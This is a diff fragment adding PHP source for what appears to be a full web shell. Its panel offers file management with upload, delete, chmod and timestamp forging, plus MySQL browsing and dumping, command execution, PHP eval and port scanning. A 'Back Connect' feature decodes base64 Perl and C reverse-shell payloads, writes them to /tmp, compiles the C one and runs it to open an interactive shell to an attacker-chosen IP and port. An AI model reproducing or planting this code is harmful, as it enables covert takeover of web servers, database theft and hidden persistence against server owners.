+function g(act,cwd,p1,p2,p3,p4,charset) {
+	s(act,cwd,p1,p2,p3,p4,charset);
+	$('opform').submit();
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed; word-break:break-all">
+<?php
+
+formhead(array('name'=>'opform'));
+makehide('act', $act);
+makehide('cwd', $cwd);
+makehide('p1', $p1);
+makehide('p2', $p2);
+makehide('p3', $p3);
+makehide('p4', $p4);
+makehide('charset', $charset);
+formfoot();
+
+if(!function_exists('posix_getegid')) {
+	$user = @get_current_user();
+	$uid = @getmyuid();
+	$gid = @getmygid();
+	$group = "?";
+} else {
+	$uid = @posix_getpwuid(@posix_geteuid());
+	$gid = @posix_getgrgid(@posix_getegid());
+	$uid = $uid['uid'];
+	$user = $uid['name'];
+	$gid = $gid['gid'];
+	$group = $gid['name'];
+}
+?>
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	<tr class="head">
+		<td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
+	</tr>
+	<tr class="alt1">
+		<td>
+			<span style="float:right;">Charset:
+			<?php
+			makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'onchange'=>'g(null,null,null,null,null,null,this.value);'));
+			?>
+			</span>
+			<a href="javascript:g('logout');">Logout</a> | 
+			<a href="javascript:g('file',null,'','','','','<?php echo $charset;?>');">File Manager</a> | 
+			<a href="javascript:g('mysqladmin',null,'','','','','<?php echo $charset;?>');">MYSQL Manager</a> | 
+			<a href="javascript:g('shell',null,'','','','','<?php echo $charset;?>');">Execute Command</a> | 
+			<a href="javascript:g('phpenv',null,'','','','','<?php echo $charset;?>');">PHP Variable</a> | 
+			<a href="javascript:g('portscan',null,'','','','','<?php echo $charset;?>');">Port Scan</a> | 
+			<a href="javascript:g('secinfo',null,'','','','','<?php echo $charset;?>');">Security information</a> | 
+			<a href="javascript:g('eval',null,'','','','','<?php echo $charset;?>');">Eval PHP Code</a>
+			<?php if (!IS_WIN) {?> | <a href="javascript:g('backconnect',null,'','','','','<?php echo $charset;?>');">Back Connect</a><?php }?>
+		</td>
+	</tr>
+</table>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<?php
+$errmsg && m($errmsg);
+
+if ($act == 'file') {
+
+	// Åжϵ±Ç°Ä¿Â¼¿ÉдÇé¿ö
+	$dir_writeable = @is_writable($cwd) ? 'Writable' : 'Non-writable';
+	if (isset($p1)) {
+		switch($p1) {
+			case 'createdir':
+				// ´´½¨Ä¿Â¼
+				if ($p2) {
+					m('Directory created '.(@mkdir($cwd.$p2,0777) ? 'success' : 'failed'));
+				}
+				break;
+			case 'uploadFile':
+				// ÉÏ´«Îļþ
+				m('File upload '.(@move_uploaded_file($_FILES['uploadfile']['tmp_name'], $cwd.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
+				break;
+			case 'fileperm':
+				// ±à¼­ÎļþÊôÐÔ
+				if ($p2 && $p3) {
+					$p3 = base_convert($p3, 8, 10);
+					m('Set file permissions '.(@chmod($p2, $p3) ? 'success' : 'failed'));
+				}
+				break;
+			case 'rename':
+				// ¸ÄÃû
+				if ($p2 && $p3) {
+					m($p3.' renamed '.$p2.(@rename($p3, $p2) ? ' success' : ' failed'));
+				}
+				break;
+			case 'clonetime':
+				// ¿Ë¡ʱ¼ä
+				if ($p2 && $p3) {
+					$time = @filemtime($p3);
+					m('Set file last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));
+				}
+				break;
+			case 'settime':
+				// ×Ô¶¨Òåʱ¼ä
+				if ($p2 && $p3) {
+					$time = strtotime($p3);
+					m('Set file last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));
+				}
+				break;
+			case 'delete':
+				// ÅúÁ¿É¾³ýÎļþ
+				if ($P['dl']) {
+					$succ = $fail = 0;
+					foreach ($P['dl'] as $f) {
+						if (is_dir($cwd.$f)) {
+							if (@deltree($cwd.$f)) {
+								$succ++;
+							} else {
+								$fail++;
+							}
+						} else {
+							if (@unlink($cwd.$f)) {
+								$succ++;
+							} else {
+								$fail++;
+							}
+						}
+					}
+					m('Deleted folder/file(s) have finished, choose '.count($P['dl']).', success '.$succ.', fail '.$fail);
+				} else {
+					m('Please select folder/file(s)');
+				}
+				break;
+			case 'paste':
+				if($_SESSION['do'] == 'copy') {
+					foreach($_SESSION['dl'] as $f) {
+						copy_paste($_SESSION['c'],$f, $cwd);					
+					}
+				} elseif($_SESSION['do'] == 'move') {
+					foreach($_SESSION['dl'] as $f) {
+						@rename($_SESSION['c'].$f, $cwd.$f);
+					}
+				}
+				unset($_SESSION['do'], $_SESSION['dl'], $_SESSION['c']);
+				break;
+			default:
+				if($p1 == 'copy' || $p1 == 'move') {
+					if (isset($P['dl']) && count($P['dl'])) {
+						$_SESSION['do'] = $p1;
+						$_SESSION['dl'] = $P['dl'];
+						$_SESSION['c'] = $P['cwd'];
+						m('Have been copied to the session');
+					} else {
+						m('Please select folder/file(s)');
+					}
+				}
+				break;
+		}
+		echo "<script type=\"text/javascript\">$('opform').p1.value='';$('opform').p2.value='';</script>";
+	}
+	//²Ù×÷Íê±Ï
+	$free = @disk_free_space($cwd);
+	!$free && $free = 0;
+	$all = @disk_total_space($cwd);
+	!$all && $all = 0;
+	$used = $all-$free;
+	p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');
+
+	$cwd_links = '';
+	$path = explode('/', $cwd);
+	$n=count($path);
+	for($i=0;$i<$n-1;$i++) {
+		$cwd_links .= '<a href="javascript:g(\'file\', \'';
+		for($j=0;$j<=$i;$j++) {
+			$cwd_links .= $path[$j].'/';
+		}
+		$cwd_links .= '\');">'.$path[$i].'/</a>';
+	}
+
+?>
+<script type="text/javascript">
+document.onclick = shownav;
+function shownav(e){
+	var src = e?e.target:event.srcElement;
+	do{
+		if(src.id =="jumpto") {
+			$('inputnav').style.display = "";
+			$('pathnav').style.display = "none";
+			return;
+		}
+		if(src.id =="inputnav") {
+			return;
+		}
+		src = src.parentNode;
+	}while(src.parentNode)
+
+	$('inputnav').style.display = "none";
+	$('pathnav').style.display = "";
+}
+</script>
+<div style="background:#eee;margin-bottom:10px;">
+	<form onsubmit="g('file',this.cwd.value);return false;" method="POST" id="godir" name="godir">
+		<table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0">
+			<tr>
+				<td width="100%"><?php echo $cwd_links.' - '.getChmod($cwd).' / '.PermsColor($cwd).getUser($cwd);?> (<?php echo $dir_writeable;?>)</td>
+				<td nowrap><input class="bt" id="jumpto" name="jumpto" value="Jump to" type="button"></td>
+			</tr>
+		</table>
+		<table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;">
+			<tr>
+				<td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($cwd);?>)</td>
+				<td width="100%"><input class="input" name="cwd" value="<?php echo $cwd;?>" type="text" style="width:99%;margin:0 8px;"></td>
+				<td nowrap><input class="bt" value="GO" type="submit"></td>
+			</tr>
+		</table>
+	</form>
+<?php
+	if (IS_WIN) {
+		$comma = '';
+		p('<div class="drives">');
+		foreach( range('A','Z') as $drive ) {
+			if (is_dir($drive.':/')) {
+				p($comma.'<a href="javascript:g(\'file\', \''.$drive.':/\');">'.$drive.':\</a>');
+				$comma = '<span>|</span>';
+			}
+		}
+		p('</div>');
+	}
+?>
+</div>
+<?php
+	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
+	p('<tr class="alt1"><td colspan="6" style="padding:5px;line-height:20px;">');
+	p('<form action="'.SELF.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input name="uploadfile" value="" type="file" /> <input class="bt" value="Upload" type="submit" /><input name="charset" value="'.$charset.'" type="hidden" /><input type="hidden" name="p1" value="uploadFile"><input name="cwd" value="'.$cwd.'" type="hidden" /></div></form>');
+	p('<a href="javascript:g(\'file\', \''.str_replace('\\','/',$web_cwd).'\');">WebRoot</a>');
+	p(' | <a href="javascript:g(\'file\', \''.$home_cwd.'\');">ScriptPath</a>');
+	p(' | <a href="javascript:g(\'file\',\''.$cwd.'\',null,null,null,\'dir\');">View Writable Directory</a> ');
+	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile();">Create File</a>');
+	p('</td></tr>');
+
+	$sort = array('filename', 1);
+	if($p1) {
+		if(preg_match('!s_([A-z_]+)_(\d{1})!', $p1, $match)) {
+			$sort = array($match[1], (int)$match[2]);
+		}
+	}
+
+	formhead(array('name'=>'flist'));
+	makehide('act','file');
+	makehide('p1','');
+	makehide('cwd',$cwd);
+	makehide('charset',$charset);
+	p('<tr class="head">');
+	p('<td width="2%" nowrap><input name="chkall" value="on" type="checkbox" onclick="checkall(this.form)" /></td>');
+	p('<td><a href="javascript:g(\'file\',null,\'s_filename_'.($sort[1]?0:1).'\');">Filename</a> '.($p1 == 's_filename_0' ? $dchar : '').($p1 == 's_filename_1' || !$p1 ? $uchar : '').'</td>');
+	p('<td width="16%"><a href="javascript:g(\'file\',null,\'s_mtime_'.($sort[1]?0:1).'\');">Last modified</a> '.($p1 == 's_mtime_0' ? $dchar : '').($p1 == 's_mtime_1' ? $uchar : '').'</td>');
+	p('<td width="10%"><a href="javascript:g(\'file\',null,\'s_size_'.($sort[1]?0:1).'\');">Size</a> '.($p1 == 's_size_0' ? $dchar : '').($p1 == 's_size_1' ? $uchar : '').'</td>');
+	p('<td width="20%">Chmod / Perms</td>');
+	p('<td width="22%">Action</td>');
+	p('</tr>');
+
+	//²é¿´ËùÓпÉдÎļþºÍĿ¼
+	$dirdata=$filedata=array();
+
+	if ($p4 == 'dir') {
+		$dirdata = GetWDirList($cwd);
+		$filedata = array();
+	} else {
+		// ĬÈÏĿ¼Áбí
+		$dirs = @scandir($cwd);
+		if ($dirs) {
+			$dirs = array_diff($dirs, array('.'));
+			foreach ($dirs as $file) {
+				$filepath=$cwd.$file;
+				if(@is_dir($filepath)){
+					$dirdb['filename']=$file;
+					$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+					$dirdb['chmod']=getChmod($filepath);
+					$dirdb['perm']=PermsColor($filepath);
+					$dirdb['owner']=getUser($filepath);
+					$dirdb['link']=$filepath;
+					if ($file=='..') {
+						$dirdata['up']=1;
+					} else {
+						$dirdata[]=$dirdb;
+					}
+				} else {
+					$filedb['filename']=$file;
+					//$filedb['size']=@filesize($filepath);
+					$filedb['size']=sprintf("%u", @filesize($filepath));
+					$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+					$filedb['chmod']=getChmod($filepath);
+					$filedb['perm']=PermsColor($filepath);
+					$filedb['owner']=getUser($filepath);
+					$filedb['link']=$filepath;
+					$filedata[]=$filedb;
+				}
+			}
+			unset($dirdb);
+			unset($filedb);
+		}
+	}
+	$dir_i = '0';
+	if (isset($dirdata['up'])) {
+		$thisbg = bg();
+		p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+		p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:g(\'file\',\''.getUpPath($cwd).'\');">Parent Directory</a></td>');
+		p('</tr>');
+	}
+	unset($dirdata['up']);
+	usort($dirdata, 'cmp');
+	usort($filedata, 'cmp');
+	foreach($dirdata as $key => $dirdb){
+		if($p1 == 'getsize' && $p2 == $dirdb['filename']) {
+			$attachsize = dirsize($p2);
+			$attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
+		} else {
+			$attachsize = '<a href="javascript:g(\'file\', null, \'getsize\', \''.$dirdb['filename'].'\');">Stat</a>';
+		}
+		$thisbg = bg();
+		p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+		p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['filename'].'"></td>');
+		p('<td><a href="javascript:g(\'file\',\''.$dirdb['link'].'\')">'.$dirdb['filename'].'</a></td>');
+		p('<td nowrap><a href="javascript:g(\'newtime\',null,\''.$dirdb['filename'].'\');">'.$dirdb['mtime'].'</a></td>');
+		p('<td nowrap>'.$attachsize.'</td>');
+		p('<td nowrap>');
+		p('<a href="javascript:fileperm(\''.$dirdb['filename'].'\', \''.$dirdb['chmod'].'\');">'.$dirdb['chmod'].'</a> / ');
+		p('<a href="javascript:fileperm(\''.$dirdb['filename'].'\', \''.$dirdb['chmod'].'\');">'.$dirdb['perm'].'</a>'.$dirdb['owner'].'</td>');
+		p('<td nowrap><a href="javascript:rename(\''.$dirdb['filename'].'\');">Rename</a></td>');
+		p('</tr>');
+		$dir_i++;
+	}
+
+	p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
+	$file_i = '0';
+
+	foreach($filedata as $key => $filedb){
+		$fileurl = '/'.str_replace($web_cwd,'',$filedb['link']);
+		$thisbg = bg();
+		p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+		p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['filename'].'"></td>');
+		p('<td>'.((strpos($filedb['link'], $web_cwd) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>');
+		p('<td nowrap><a href="javascript:g(\'newtime\',null,\''.$filedb['filename'].'\');">'.$filedb['mtime'].'</a></td>');
+		p('<td nowrap>'.sizecount($filedb['size']).'</td>');
+		p('<td nowrap>');
+		p('<a href="javascript:fileperm(\''.$filedb['filename'].'\', \''.$filedb['chmod'].'\');">'.$filedb['chmod'].'</a> / ');
+		p('<a href="javascript:fileperm(\''.$filedb['filename'].'\', \''.$filedb['chmod'].'\');">'.$filedb['perm'].'</a>'.$filedb['owner'].'</td>');
+		p('<td nowrap>');
+		p('<a href="javascript:g(\'down\',null,\''.$filedb['filename'].'\');">Down</a> | ');
+		p('<a href="javascript:g(\'editfile\',null,null,\''.$filedb['filename'].'\');">Edit</a> | ');
+		p('<a href="javascript:rename(\''.$filedb['filename'].'\');">Rename</a>');
+		p('</td></tr>');
+		$file_i++;
+	}
+	p('<tr class="'.bg().' head"><td colspan="5"><a href="#" onclick="$(\'flist\').p1.value=\'delete\';$(\'flist\').submit();">Delete</a> | <a href="#" onclick="$(\'flist\').p1.value=\'copy\';$(\'flist\').submit();">Copy</a> | <a href="#" onclick="$(\'flist\').p1.value=\'move\';$(\'flist\').submit();">Move</a>'.(isset($_SESSION['do']) && @count($_SESSION['dl']) ? ' | <a href="#" onclick="$(\'flist\').p1.value=\'paste\';$(\'flist\').submit();">Paste</a>' : '').'</td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
+	p('</form></table>');
+}// end dir
+
+elseif ($act == 'mysqladmin') {
+	$order = isset($P['order']) ? $P['order'] : '';
+	$dbhost = isset($P['dbhost']) ? $P['dbhost'] : '';
+	$dbuser = isset($P['dbuser']) ? $P['dbuser'] : '';
+	$dbpass = isset($P['dbpass']) ? $P['dbpass'] : '';
+	$dbname = isset($P['dbname']) ? $P['dbname'] : '';
+	$tablename = isset($P['tablename']) ? $P['tablename'] : '';
+
+	if ($doing == 'dump') {
+		if (isset($P['bak_table']) && $P['bak_table']) {
+			$DB = new DB_MySQL;
+			$DB->charsetdb = $charsetdb;
+			$DB->charset = $charset;
+			$DB->connect($dbhost, $dbuser, $dbpass, $dbname);
+			if ($P['saveasfile'] && $P['bak_path']) {
+				$fp = @fopen($P['bak_path'],'w');
+				if ($fp) {
+					foreach($P['bak_table'] as $k => $v) {
+						if ($v) {
+							$DB->sqldump($v, $fp);
+						}
+					}
+					fclose($fp);				
+					$fileurl = str_replace(SA_ROOT,'',$P['bak_path']);
+					m('Database has backup to <a href="'.$fileurl.'" target="_blank">'.$P['bak_path'].'</a>');
+				} else {
+					m('Backup failed');
+				}
+			} else {
+				@ob_end_clean();
+				$filename = basename($dbname.'.sql');
+				header('Content-type: application/unknown');
+				header('Content-Disposition: attachment; filename='.$filename);
+				foreach($P['bak_table'] as $k => $v) {
+					if ($v) {
+						$DB->sqldump($v);
+					}
+				}
+				exit;
+			}
+			$DB->close();
+		} else {
+			m('Please choose the table');
+		}
+		$doing = '';
+	}
+
+	formhead(array('title'=>'MYSQL Manager', 'name'=>'dbform'));
+	makehide('act','mysqladmin');
+	makehide('doing',$doing);
+	makehide('charset', $charset);
+	makehide('tablename', $tablename);
+	makehide('order', $order);
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	makeinput(array('value'=>'Connect','type'=>'submit','class'=>'bt'));
+	p('</p>');
+
+	if ($dbhost && $dbuser && isset($dbpass)) {
+		
+		// ³õʼ»¯Êý¾Ý¿âÀà
+		$DB = new DB_MySQL;
+		$DB->charsetdb = $charsetdb;
+		$DB->charset = $charset;
+		$DB->connect($dbhost, $dbuser, $dbpass, $dbname);
+
+		//»ñÈ¡Êý¾Ý¿âÐÅÏ¢
+		p('<p class="red">MySQL '.$DB->version().' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
+		$highver = $DB->version() > '4.1' ? 1 : 0;
+
+		//»ñÈ¡Êý¾Ý¿â
+		$query = $DB->query("SHOW DATABASES");
+		$dbs = array();
+		$dbs[] = '-- Select a database --';
+		while($db = $DB->fetch($query)) {
+			$dbs[$db['Database']] = $db['Database'];
+		}
+		makeselect(array('name'=>'dbname','option'=>$dbs,'selected'=>$dbname,'onchange'=>'setdb(this.options[this.selectedIndex].value)'));
+
+		if ($dbname) {
+			p('<p>Current dababase: <a href="javascript:setdb(\''.$dbname.'\');">'.$dbname.'</a>');
+			if ($tablename) {
+				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> ]');
+			}
+			p('</p>');
+
+			$sql_query = isset($P['sql_query']) ? $P['sql_query'] : '';
+
+			if ($tablename && !$sql_query) {
+				$sql_query = "SELECT * FROM $tablename LIMIT 0, 30";
+			}
+			if ($tablename && $doing == 'structure') {
+				$sql_query = "SHOW FULL COLUMNS FROM $tablename;\n";
+				$sql_query .= "SHOW INDEX FROM $tablename;";
+			}
+			p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" onclick="$(\'doing\').value=\'\'" style="height:50px;" type="submit" value="Query" /></td></tr></table></p>');
+			if ($sql_query) {
+				$querys = @explode(';',$sql_query);
+				foreach($querys as $num=>$query) {
+					if ($query) {
+						p("<p class=\"red b\">Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</p>");
+						switch($DB->query_res($query))
+						{
+							case 0:
+								p('<h2>'.$DB->halt('Error').'</h2>');
+								break;	
+							case 1:
+								$result = $DB->query($query);
+								$tatol = $DB->num_rows($result);
+								p('<table border="0" cellpadding="3" cellspacing="0">');
+								p('<tr class="head">');
+								$fieldnum = @mysql_num_fields($result);
+								for($i=0;$i<$fieldnum;$i++){
+									p('<td nowrap>'.@mysql_field_name($result, $i).'</td>');
+								}
+								p('</tr>');
+								
+								if (!$tatol) {
+									p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';"><td nowrap colspan="'.$fieldnum.'" class="red b">No records</td></tr>');
+								} else {
+									while($mn = $DB->fetch($result)){
+										$thisbg = bg();
+										p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+										//¶ÁÈ¡¼Ç¼ÓÃ
+										foreach($mn as $key=>$inside){
+											p('<td nowrap>'.(($inside == null) ? '<i>null</i>' : html_clean($inside)).'</td>');
+										}
+										p('</tr>');
+										unset($b1);
+									}
+								}
+								p('</table>');
+								break;
+							case 2:
+								p('<h2>Affected Rows : '.$DB->affected_rows().'</h2>');
+								break;
+						}
+					}
+				}
+			} else {
+				$query = $DB->query("SHOW TABLE STATUS");
+				$table_num = $table_rows = $data_size = 0;
+				$tabledb = array();
+				while($table = $DB->fetch($query)) {
+					$data_size = $data_size + $table['Data_length'];
+					$table_rows = $table_rows + $table['Rows'];
+					$table_num++;
+					$tabledb[] = $table;
+				}
+				$data_size = sizecount($data_size);
+				unset($table);
+				if (count($tabledb)) {
+					if ($highver) {
+						$db_engine = $DB->fetch($DB->query("SHOW VARIABLES LIKE 'storage_engine';"));						
+						$db_collation = $DB->fetch($DB->query("SHOW VARIABLES LIKE 'collation_database';"));
+					}
+					$sort = array('Name', 1);
+					if($order) {
+						if(preg_match('!s_([A-z_]+)_(\d{1})!', $order, $match)) {
+							$sort = array($match[1], (int)$match[2]);
+						}
+					}
+					usort($tabledb, 'cmp');
+					p('<table border="0" cellpadding="0" cellspacing="0" id="lists">');
+					p('<tr class="head">');
+					p('<td width="2%"><input name="chkall" value="on" type="checkbox" onclick="checkall(this.form)" /></td>');
+					p('<td><a href="javascript:setsort(\'s_Name_'.($sort[1]?0:1).'\');">Name</a> '.($order == 's_Name_0' ? $dchar : '').($order == 's_Name_1' || !$order ? $uchar : '').'</td>');
+					p('<td><a href="javascript:setsort(\'s_Rows_'.($sort[1]?0:1).'\');">Rows</a>'.($order == 's_Rows_0' ? $dchar : '').($order == 's_Rows_1' ? $uchar : '').'</td>');
+					p('<td><a href="javascript:setsort(\'s_Data_length_'.($sort[1]?0:1).'\');">Data_length</a>'.($order == 's_Data_length_0' ? $dchar : '').($order == 's_Data_length_1' ? $uchar : '').'</td>');
+					p('<td><a href="javascript:setsort(\'s_Create_time_'.($sort[1]?0:1).'\');">Create_time</a>'.($order == 's_Create_time_0' ? $dchar : '').($order == 's_Create_time_1' ? $uchar : '').'</td>');
+					p('<td><a href="javascript:setsort(\'s_Update_time_'.($sort[1]?0:1).'\');">Update_time</a>'.($order == 's_Update_time_0' ? $dchar : '').($order == 's_Update_time_1' ? $uchar : '').'</td>');
+					if ($highver) {
+						p('<td>Engine</td>');
+						p('<td>Collation</td>');
+					}
+					p('<td>Other</td>');
+					p('</tr>');
+					foreach ($tabledb as $key => $table) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td align="center" width="2%"><input type="checkbox" name="bak_table[]" value="'.$table['Name'].'" /></td>');
+						p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
+						p('<td>'.$table['Rows'].'&nbsp;</td>');
+						p('<td>'.sizecount($table['Data_length']).'</td>');
+						p('<td>'.$table['Create_time'].'&nbsp;</td>');
+						p('<td>'.$table['Update_time'].'&nbsp;</td>');
+						if ($highver) {
+							p('<td>'.$table['Engine'].'</td>');
+							p('<td>'.$table['Collation'].'</td>');
+						}
+						p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a></td>');
+						p('</tr>');
+					}
+					p('<tr class="head">');
+					p('<td width="2%">&nbsp;</td>');
+					p('<td>'.$table_num.' table(s)</td>');
+					p('<td>'.$table_rows.'</td>');
+					p('<td>'.$data_size.'</td>');
+					p('<td>&nbsp;</td>');
+					p('<td>&nbsp;</td>');
+					if ($highver) {
+						p('<td>'.$db_engine['Value'].'</td>');
+						p('<td>'.$db_collation['Value'].'</td>');
+					}
+					p('<td>&nbsp;</td>');
+					p('</tr>');
+					p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"bak_path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"button\" value=\"Export selection table\" onclick=\"$('doing').value='dump';$('dbform').submit();\" /></td></tr>");
+					p("</table>");
+				} else {
+					p('<p class="red b">No tables</p>');
+				}
+				$DB->free_result($query);
+			}
+		}
+		$DB->close();
+	}
+	formfoot();
+}//end mysql
+
+elseif ($act == 'backconnect') {
+
+	!$p2 && $p2 = $_SERVER['REMOTE_ADDR'];
+	!$p3 && $p3 = '12345';
+	$usedb = array('perl'=>'perl','c'=>'c');
+
+	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
+		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
+		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
+		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
+		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
+		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
+		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
+		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
+		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
+		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
+		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
+		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
+		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
+		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+	if ($p1 == 'start' && $p2 && $p3 && $p4){
+		if ($p4 == 'perl') {
+			cf('/tmp/angel_bc',$back_connect);
+			$res = execute(which('perl')." /tmp/angel_bc ".$p2." ".$p3." &");
+		} else {
+			cf('/tmp/angel_bc.c',$back_connect_c);
+			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
+			@unlink('/tmp/angel_bc.c');
+			$res = execute("/tmp/angel_bc ".$p2." ".$p3." &");
+		}
+		m('Now script try connect to '.$p2.':'.$p3.' ...');
+	}
+
+	formhead(array('title'=>'Back Connect', 'onsubmit'=>'g(\'backconnect\',null,\'start\',this.p2.value,this.p3.value,this.p4.value);return false;'));
+	p('<p>');
+	p('Your IP:');
+	makeinput(array('name'=>'p2','size'=>20,'value'=>$p2));
+	p('Your Port:');
+	makeinput(array('name'=>'p3','size'=>15,'value'=>$p3));
+	p('Use:');
+	makeselect(array('name'=>'p4','option'=>$usedb,'selected'=>$p4));
+	makeinput(array('value'=>'Start','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+}//end
+
+elseif ($act == 'portscan') {
+	!$p2 && $p2 = '127.0.0.1';
+	!$p3 && $p3 = '21,80,135,139,445,1433,3306,3389,5631,43958';
+	formhead(array('title'=>'Port Scan', 'onsubmit'=>'g(\'portscan\',null,\'start\',this.p2.value,this.p3.value);return false;'));
+	p('<p>');
+	p('IP:');
+	makeinput(array('name'=>'p2','size'=>20,'value'=>$p2));
+	p('Port:');
+	makeinput(array('name'=>'p3','size'=>80,'value'=>$p3));
+	makeinput(array('value'=>'Scan','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+
+	if ($p1 == 'start') {
+		p('<h2>Result &raquo;</h2>');
+		p('<ul class="info">');
